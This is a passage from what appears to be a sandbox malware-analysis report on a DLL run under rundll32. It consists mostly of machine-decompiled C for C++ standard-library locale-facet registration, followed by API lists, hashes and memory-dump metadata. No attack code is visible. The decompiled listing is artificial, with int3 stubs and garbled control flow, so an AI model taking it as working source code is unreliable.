																																																										_t963 =  *0x6e2c6dfc; // 0x0
																																																										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																										 *(_t990 - 0x10) = _t963;
																																																										_t555 = E6E1E161C(0x6e2c6da8);
																																																										_t828 =  *((intOrPtr*)(_t990 + 8));
																																																										_t940 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t555);
																																																										__eflags = _t940;
																																																										if(_t940 != 0) {
																																																											L131:
																																																											E6E2066BA(_t990 - 0x14);
																																																											return E6E220075(_t940);
																																																										} else {
																																																											__eflags = _t963;
																																																											if(_t963 == 0) {
																																																												_push( *((intOrPtr*)(_t990 + 8)));
																																																												_push(_t990 - 0x10);
																																																												__eflags = E6E2114EC(_t699, _t828, _t920, _t940, _t963) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1E1438(_t990 - 0x20);
																																																													E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e2683cf, _t699, _t940, _t963, 0x14);
																																																													E6E206653(_t990 - 0x14, 0);
																																																													_t964 =  *0x6e2c6dcc; // 0x0
																																																													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																													 *(_t990 - 0x10) = _t964;
																																																													_t568 = E6E1E161C(0x6e2c6d80);
																																																													_t835 =  *((intOrPtr*)(_t990 + 8));
																																																													_t941 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t568);
																																																													__eflags = _t941;
																																																													if(_t941 != 0) {
																																																														L138:
																																																														E6E2066BA(_t990 - 0x14);
																																																														return E6E220075(_t941);
																																																													} else {
																																																														__eflags = _t964;
																																																														if(_t964 == 0) {
																																																															_push( *((intOrPtr*)(_t990 + 8)));
																																																															_push(_t990 - 0x10);
																																																															__eflags = E6E211558(_t699, _t835, _t920, _t941, _t964) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6E1E1438(_t990 - 0x20);
																																																																E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																																asm("int3");
																																																																E6E2200AC(0x6e2683cf, _t699, _t941, _t964, 0x14);
																																																																E6E206653(_t990 - 0x14, 0);
																																																																_t965 =  *0x6e2c6e00; // 0x0
																																																																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																 *(_t990 - 0x10) = _t965;
																																																																_t581 = E6E1E161C(0x6e2c6dac);
																																																																_t842 =  *((intOrPtr*)(_t990 + 8));
																																																																_t942 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t581);
																																																																__eflags = _t942;
																																																																if(_t942 != 0) {
																																																																	L145:
																																																																	E6E2066BA(_t990 - 0x14);
																																																																	return E6E220075(_t942);
																																																																} else {
																																																																	__eflags = _t965;
																																																																	if(_t965 == 0) {
																																																																		_push( *((intOrPtr*)(_t990 + 8)));
																																																																		_push(_t990 - 0x10);
																																																																		__eflags = E6E2115C4(_t699, _t842, _t920, _t942, _t965) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E6E1E1438(_t990 - 0x20);
																																																																			E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																																			asm("int3");
																																																																			E6E2200AC(0x6e2683cf, _t699, _t942, _t965, 0x14);
																																																																			E6E206653(_t990 - 0x14, 0);
																																																																			_t966 =  *0x6e2c6dd0; // 0x0
																																																																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																			 *(_t990 - 0x10) = _t966;
																																																																			_t594 = E6E1E161C(0x6e2c6d60);
																																																																			_t849 =  *((intOrPtr*)(_t990 + 8));
																																																																			_t943 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t594);
																																																																			__eflags = _t943;
																																																																			if(_t943 != 0) {
																																																																				L152:
																																																																				E6E2066BA(_t990 - 0x14);
																																																																				return E6E220075(_t943);
																																																																			} else {
																																																																				__eflags = _t966;
																																																																				if(_t966 == 0) {
																																																																					_push( *((intOrPtr*)(_t990 + 8)));
																																																																					_push(_t990 - 0x10);
																																																																					__eflags = E6E21162A(_t699, _t849, _t920, _t943, _t966) - 0xffffffff;
																																																																					if(__eflags == 0) {
																																																																						_t853 = _t990 - 0x20;
																																																																						E6E1E1438(_t853);
																																																																						E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																																						asm("int3");
																																																																						E6E2200AC(0x6e26851f, _t699, _t943, _t966, 4);
																																																																						_t967 = _t853;
																																																																						 *(_t990 - 0x10) = _t967;
																																																																						 *((intOrPtr*)(_t967 + 4)) =  *((intOrPtr*)(_t990 + 0xc));
																																																																						_push( *((intOrPtr*)(_t990 + 0x14)));
																																																																						_t315 = _t990 - 4;
																																																																						 *_t315 =  *(_t990 - 4) & 0x00000000;
																																																																						__eflags =  *_t315;
																																																																						 *_t967 = 0x6e26c0c4;
																																																																						 *((char*)(_t967 + 0x28)) =  *((intOrPtr*)(_t990 + 0x10));
																																																																						E6E21542F(_t699, _t853, _t920, _t943, _t967,  *_t315);
																																																																						return E6E220075(_t967,  *((intOrPtr*)(_t990 + 8)));
																																																																					} else {
																																																																						_t943 =  *(_t990 - 0x10);
																																																																						 *(_t990 - 0x10) = _t943;
																																																																						 *(_t990 - 4) = 1;
																																																																						E6E206FD3(__eflags, _t943);
																																																																						 *0x6e26a26c();
																																																																						 *((intOrPtr*)( *((intOrPtr*)( *_t943 + 4))))();
																																																																						 *0x6e2c6dd0 = _t943;
																																																																						goto L152;
																																																																					}
																																																																				} else {
																																																																					_t943 = _t966;
																																																																					goto L152;
																																																																				}
																																																																			}
																																																																		} else {
																																																																			_t942 =  *(_t990 - 0x10);
																																																																			 *(_t990 - 0x10) = _t942;
																																																																			 *(_t990 - 4) = 1;
																																																																			E6E206FD3(__eflags, _t942);
																																																																			 *0x6e26a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t942 + 4))))();
																																																																			 *0x6e2c6e00 = _t942;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t942 = _t965;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t941 =  *(_t990 - 0x10);
																																																																 *(_t990 - 0x10) = _t941;
																																																																 *(_t990 - 4) = 1;
																																																																E6E206FD3(__eflags, _t941);
																																																																 *0x6e26a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t941 + 4))))();
																																																																 *0x6e2c6dcc = _t941;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t941 = _t964;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t940 =  *(_t990 - 0x10);
																																																													 *(_t990 - 0x10) = _t940;
																																																													 *(_t990 - 4) = 1;
																																																													E6E206FD3(__eflags, _t940);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t940 + 4))))();
																																																													 *0x6e2c6dfc = _t940;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t940 = _t963;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t939 =  *(_t990 - 0x10);
																																																										 *(_t990 - 0x10) = _t939;
																																																										 *(_t990 - 4) = 1;
																																																										E6E206FD3(__eflags, _t939);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t939 + 4))))();
																																																										 *0x6e2c6de0 = _t939;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t939 = _t962;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t938 =  *(_t990 - 0x10);
																																																							 *(_t990 - 0x10) = _t938;
																																																							 *(_t990 - 4) = 1;
																																																							E6E206FD3(__eflags, _t938);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t938 + 4))))();
																																																							 *0x6e2c6ddc = _t938;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t938 = _t961;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t937 =  *(_t990 - 0x10);
																																																				 *(_t990 - 0x10) = _t937;
																																																				 *(_t990 - 4) = 1;
																																																				E6E206FD3(__eflags, _t937);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t937 + 4))))();
																																																				 *0x6e2c6db0 = _t937;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t937 = _t960;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t936 =  *(_t990 - 0x10);
																																																	 *(_t990 - 0x10) = _t936;
																																																	 *(_t990 - 4) = 1;
																																																	E6E206FD3(__eflags, _t936);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t936 + 4))))();
																																																	 *0x6e2c6dd8 = _t936;
																																																	goto L103;
																																																}
																																															} else {
																																																_t936 = _t959;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t935 =  *(_t990 - 0x10);
																																														 *(_t990 - 0x10) = _t935;
																																														 *(_t990 - 4) = 1;
																																														E6E206FD3(__eflags, _t935);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t935 + 4))))();
																																														 *0x6e2c6dc4 = _t935;
																																														goto L96;
																																													}
																																												} else {
																																													_t935 = _t958;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t934 =  *(_t990 - 0x10);
																																											 *(_t990 - 0x10) = _t934;
																																											 *(_t990 - 4) = 1;
																																											E6E206FD3(__eflags, _t934);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t934 + 4))))();
																																											 *0x6e2c6dc8 = _t934;
																																											goto L89;
																																										}
																																									} else {
																																										_t934 = _t957;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t933 =  *(_t990 - 0x10);
																																								 *(_t990 - 0x10) = _t933;
																																								 *(_t990 - 4) = 1;
																																								E6E206FD3(__eflags, _t933);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t933 + 4))))();
																																								 *0x6e2c6df4 = _t933;
																																								goto L82;
																																							}
																																						} else {
																																							_t933 = _t956;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t932 =  *(_t990 - 0x10);
																																					 *(_t990 - 0x10) = _t932;
																																					 *(_t990 - 4) = 1;
																																					E6E206FD3(__eflags, _t932);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t932 + 4))))();
																																					 *0x6e2c6df8 = _t932;
																																					goto L75;
																																				}
																																			} else {
																																				_t932 = _t955;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t931 =  *(_t990 - 0x10);
																																		 *(_t990 - 0x10) = _t931;
																																		 *(_t990 - 4) = 1;
																																		E6E206FD3(__eflags, _t931);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t931 + 4))))();
																																		 *0x6e2c6dc0 = _t931;
																																		goto L68;
																																	}
																																} else {
																																	_t931 = _t954;
																																	goto L68;
																																}
																															}
																														} else {
																															_t930 =  *(_t990 - 0x10);
																															 *(_t990 - 0x10) = _t930;
																															 *(_t990 - 4) = 1;
																															E6E206FD3(__eflags, _t930);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t930 + 4))))();
																															 *0x6e2c6df0 = _t930;
																															goto L61;
																														}
																													} else {
																														_t930 = _t953;
																														goto L61;
																													}
																												}
																											} else {
																												_t929 =  *(_t990 - 0x10);
																												 *(_t990 - 0x10) = _t929;
																												 *(_t990 - 4) = 1;
																												E6E206FD3(__eflags, _t929);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t929 + 4))))();
																												 *0x6e2c6dbc = _t929;
																												goto L54;
																											}
																										} else {
																											_t929 = _t952;
																											goto L54;
																										}
																									}
																								} else {
																									_t928 =  *(_t990 - 0x10);
																									 *(_t990 - 0x10) = _t928;
																									 *(_t990 - 4) = 1;
																									E6E206FD3(__eflags, _t928);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t928 + 4))))();
																									 *0x6e2c6dec = _t928;
																									goto L47;
																								}
																							} else {
																								_t928 = _t951;
																								goto L47;
																							}
																						}
																					} else {
																						_t927 =  *(_t990 - 0x10);
																						 *(_t990 - 0x10) = _t927;
																						 *(_t990 - 4) = 1;
																						E6E206FD3(__eflags, _t927);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t927 + 4))))();
																						 *0x6e2c6db8 = _t927;
																						goto L40;
																					}
																				} else {
																					_t927 = _t950;
																					goto L40;
																				}
																			}
																		} else {
																			_t926 =  *(_t990 - 0x10);
																			 *(_t990 - 0x10) = _t926;
																			 *(_t990 - 4) = 1;
																			E6E206FD3(__eflags, _t926);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t926 + 4))))();
																			 *0x6e2c6de8 = _t926;
																			goto L33;
																		}
																	} else {
																		_t926 = _t949;
																		goto L33;
																	}
																}
															} else {
																_t925 =  *(_t990 - 0x10);
																 *(_t990 - 0x10) = _t925;
																 *(_t990 - 4) = 1;
																E6E206FD3(__eflags, _t925);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t925 + 4))))();
																 *0x6e2c6dd4 = _t925;
																goto L26;
															}
														} else {
															_t925 = _t948;
															goto L26;
														}
													}
												} else {
													_t924 =  *(_t990 - 0x10);
													 *(_t990 - 0x10) = _t924;
													 *(_t990 - 4) = 1;
													E6E206FD3(__eflags, _t924);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t924 + 4))))();
													 *0x6e2c6db4 = _t924;
													goto L19;
												}
											} else {
												_t924 = _t947;
												goto L19;
											}
										}
									} else {
										_t923 =  *(_t990 - 0x10);
										 *(_t990 - 0x10) = _t923;
										 *(_t990 - 4) = 1;
										E6E206FD3(__eflags, _t923);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6e2c6de4 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6E206FD3(__eflags, _t922);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6e2c6e04 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E20EEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6E20EEFC
int.LIBCPMT ref: 6E20EF13

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

codecvt.LIBCPMT ref: 6E20EF36
std::_Facet_Register.LIBCPMT ref: 6E20EF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20EF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20EF8B

Strings

0k,n, xrefs: 6E20EF07

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0k,n
API String ID: 2594415655-114697357
Opcode ID: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
Instruction ID: 5986fe8daf7e90926c789368786eb62b9e312487daab31bd92e13b7db7bf81cc
Opcode Fuzzy Hash: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
Instruction Fuzzy Hash: 9C11E375A1091ECBCF00EBE0C898AEDB77BAF44714F140909E4107B2D0DBB49E80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t462 - 0x14, 0);
				_t441 =  *0x6e2c6dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6E1E161C(0x6e2c6d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6E2066BA(_t462 - 0x14);
					return E6E220075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6E211230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t462 - 0x20);
							E6E223D74(_t462 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t430, _t441, 0x14);
							E6E206653(_t462 - 0x14, 0);
							_t442 =  *0x6e2c6dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6E1E161C(0x6e2c6d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6E2066BA(_t462 - 0x14);
								return E6E220075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6E2112B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t462 - 0x20);
										E6E223D74(_t462 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t327, _t431, _t442, 0x14);
										E6E206653(_t462 - 0x14, 0);
										_t443 =  *0x6e2c6dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6E1E161C(0x6e2c6d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6E2066BA(_t462 - 0x14);
											return E6E220075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6E211339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t462 - 0x20);
													E6E223D74(_t462 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t327, _t432, _t443, 0x14);
													E6E206653(_t462 - 0x14, 0);
													_t444 =  *0x6e2c6db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6E1E161C(0x6e2c6d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6E2066BA(_t462 - 0x14);
														return E6E220075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6E2113A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t462 - 0x20);
																E6E223D74(_t462 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t327, _t433, _t444, 0x14);
																E6E206653(_t462 - 0x14, 0);
																_t445 =  *0x6e2c6ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6E1E161C(0x6e2c6d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6E2066BA(_t462 - 0x14);
																	return E6E220075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6E211409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t462 - 0x20);
																			E6E223D74(_t462 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t327, _t434, _t445, 0x14);
																			E6E206653(_t462 - 0x14, 0);
																			_t446 =  *0x6e2c6de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6E1E161C(0x6e2c6d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6E2066BA(_t462 - 0x14);
																				return E6E220075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6E211471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t462 - 0x20);
																						E6E223D74(_t462 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t327, _t435, _t446, 0x14);
																						E6E206653(_t462 - 0x14, 0);
																						_t447 =  *0x6e2c6dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6E1E161C(0x6e2c6da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6E2066BA(_t462 - 0x14);
																							return E6E220075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6E2114EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t462 - 0x20);
																									E6E223D74(_t462 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t327, _t436, _t447, 0x14);
																									E6E206653(_t462 - 0x14, 0);
																									_t448 =  *0x6e2c6dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6E1E161C(0x6e2c6d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6E2066BA(_t462 - 0x14);
																										return E6E220075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6E211558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t462 - 0x20);
																												E6E223D74(_t462 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t327, _t437, _t448, 0x14);
																												E6E206653(_t462 - 0x14, 0);
																												_t449 =  *0x6e2c6e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6E1E161C(0x6e2c6dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6E2066BA(_t462 - 0x14);
																													return E6E220075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6E2115C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t462 - 0x20);
																															E6E223D74(_t462 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t327, _t438, _t449, 0x14);
																															E6E206653(_t462 - 0x14, 0);
																															_t450 =  *0x6e2c6dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6E1E161C(0x6e2c6d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6E2066BA(_t462 - 0x14);
																																return E6E220075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6E21162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6E1E1438(_t397);
																																		E6E223D74(_t462 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e26851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6e26c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6E21542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6E220075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6E206FD3(__eflags, _t439);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6e2c6dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6E206FD3(__eflags, _t438);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6e2c6e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6E206FD3(__eflags, _t437);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6e2c6dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6E206FD3(__eflags, _t436);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6e2c6dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6E206FD3(__eflags, _t435);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6e2c6de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6E206FD3(__eflags, _t434);
																			 *0x6e26a26c();
